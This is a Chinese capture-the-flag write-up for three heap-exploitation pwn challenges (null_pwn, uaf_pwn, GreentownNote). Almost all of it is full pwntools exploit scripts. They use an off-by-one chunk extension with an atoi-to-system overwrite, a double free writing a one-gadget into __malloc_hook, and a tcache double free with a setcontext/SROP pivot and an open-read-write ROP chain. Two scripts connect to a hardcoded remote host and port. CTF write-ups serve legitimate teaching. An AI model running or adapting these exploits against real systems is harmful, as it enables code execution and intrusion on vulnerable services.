绿城杯

Posted on | In | Visitors: |
绿城杯WP

null_pwn

这个可以溢出一个字节并且没开atoi,chunk extent泄露libc + atoi改system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *

#p = process("./pwn")
#ip: 82.157.5.28
#port: 51204
p = remote("82.157.5.28",51204)
#context.log_level = "debug"

libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

context.arch = "amd64"
context.os = "linux"
#gdb.attach(p)

def add(idx,size,con):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Index:")
	p.sendline(str(idx))
	p.recvuntil("Size of Heap : ")
	p.sendline(str(size))
	p.recvuntil("Content?:")
	p.send(con)

def free(idx):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index:")
	p.sendline(str(idx))

def edit(idx,con):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index:")
	p.sendline(str(idx))
	p.recvuntil("Content?:")
	p.send(con)

def show(idx):
	p.recvuntil("Your choice :")
	p.sendline("4")
	p.recvuntil("Index :")
	p.sendline(str(idx))

add(0,0x28,"a"*0x20)
add(1,0x60,"aaaaa")
add(2,0x68,"ttbjj")#2
add(3,0x40,"etyui")
add(4,0x40,"uuuuu")
edit(0,"a"*0x28 + p8(0xe1))
free(1)
add(1,0x60,"aaaaa")
show(2)
#print p.recv()

p.recvuntil("Content : ")
libc_base = u64(p.recv(6).ljust(8,"\x00")) - 88 - 0x10 - libc.sym["__malloc_hook"]
log.info("libc_base: " + hex(libc_base))
sys_ad = libc_base + libc.sym["system"]
atoi = libc_base + libc.sym["atoi"]
log.info("system: " + hex(sys_ad))
log.info("atoi: " + hex(atoi))
add(5,0x68,"aaaaa")#5
free(2)
edit(5,p64(0x6020bd))
add(2,0x68,"aaaa")
payload = "a"*3 + p64(0)*2 + p64(0x0000006000000038) + p64(0x0000004000000000)
payload += p64(0x0000006800000040) + p64(0)*5 + p64(0x602068)
add(6,0x68,payload)
#gdb.attach(p)
edit(0,p64(sys_ad))

p.recvuntil("Your choice :")
p.sendline("sh\x00")
#gdb.attach(p)
p.interactive()

uaf_pwn

直接doublefree,分配到malloc_hook上写og

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pwn import *

#p = process("./uaf_pwn")

p = remote("82.157.5.28",52102)

#context.log_level = "debug"

libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

context.arch = "amd64"
context.os = "linux"
#gdb.attach(p)

stack = int(p.recv(14),16)
log.info("ad: " + hex(stack))

def add(size):
	p.recvuntil(">")
	p.sendline("1")
	p.recvuntil("size>")
	p.sendline(str(size))

def free(idx):
	p.recvuntil(">")
	p.sendline("2")
	p.recvuntil("index>")
	p.sendline(str(idx))

def edit(idx,con):
	p.recvuntil(">")
	p.sendline("3")
	p.recvuntil("index>")
	p.sendline(str(idx))
	p.recvuntil("content>")
	p.send(con)

def show(idx):
	p.recvuntil(">")
	p.sendline("4")
	p.recvuntil("index>")
	p.sendline(str(idx))

add(0xa0)#0
add(0x10)#1
free(0)
show(0)
libc_base = u64(p.recv(6).ljust(8,"\x00")) - 88 - 0x10 - libc.sym["__malloc_hook"]
malloc_hook = libc_base + libc.sym["__malloc_hook"]
og = libc_base + 0x4527a#0x4527a 0xf03a4 0xf1247
log.info("libc_base: " + hex(libc_base))
log.info("malloc_hook: " + hex(malloc_hook))
add(0xa0)#2
add(0x68)#3
add(0x68)#4
free(3)
free(4)
free(3)
add(0x68)#5
edit(5,p64(malloc_hook - 0x23))
add(0x68)#6
add(0x68)#7
add(0x68)#8
edit(8,"a"*3 + p64(0)*2 + p64(og))
add(0x10)
p.interactive()

GreentownNote

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
from pwn import *

#context.log_level='debug'

p = process("./pwn")
elf=ELF('./pwn')
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
#context.log_level = "debug"
context.os = "linux"
context.arch = "amd64"

def add(size,con):
	p.recvuntil("> Your choice :")
	p.sendline("1")	
	p.recvuntil("> Note size :")
	p.sendline(str(size))
	p.recvuntil("> Content :")
	p.send(con)

def show(idx):
	p.recvuntil("> Your choice :")
	p.sendline("2")
	p.recvuntil("| Index :")
	p.sendline(str(idx))

def free(idx):
	p.recvuntil("> Your choice :")
	p.sendline("3")
	p.recvuntil("| Index :")
	p.sendline(str(idx))

add(0x400,"aaaa")
add(0x400,"bbbb")
for i in range(8):
	free(0)
add(0x400,"a"*8)#0
free(1)
show(0)
p.recvuntil("a"*8)
libc_base = libc_base = u64(p.recv(6).ljust(8,"\x00")) - 96 - 0x10 - libc.sym["__malloc_hook"] 
log.info("libc_base: " + hex(libc_base))
setcontext = libc_base + libc.sym["setcontext"] + 53
free_hook = libc_base + libc.sym["__free_hook"]
add(0x300,"aaaa")#1
free(1)
free(1)

add(0x300,p8(0x60))
show(1)
p.recvuntil("| Content: ")
heap = u64(p.recv(6).ljust(8,"\x00"))
heap = heap & 0xfffffffffffff000

log.info("heap: " + hex(heap))
ad1 = heap + 0x260

free(1)
free(1)

rdi = 0x000000000002155f + libc_base
rsi = 0x0000000000023e8a + libc_base
rax = 0x0000000000043a78 + libc_base
rdx = 0x0000000000001b96 + libc_base
syscall = 0x00000000000d29d5 + libc_base
ret = 0x00000000000008aa + libc_base

write = libc_base + libc.sym["puts"]
flag_ad = heap + 0x408

payload = p64(rdi) + p64(flag_ad)
payload += p64(rsi) + p64(0)
payload += p64(rax) + p64(2) + p64(syscall)

payload += p64(rdi) + p64(3) + p64(rsi) + p64(heap + 0x100)
payload += p64(rdx) + p64(0x100)
payload += p64(rax) + p64(0) + p64(syscall)

payload += p64(rax) + p64(1)
payload += p64(rdi) + p64(heap + 0x100)
payload += p64(write)


frame = SigreturnFrame()
frame.rsp = heap + 0x360
frame.rip = ret

add(0x300,p64(free_hook))

add(0x300,str(frame)  + "a"*8 + payload + "./flag\x00\x00" + "./flag\x00\x00")
add(0x300,p64(setcontext))

free(2)

p.interactive()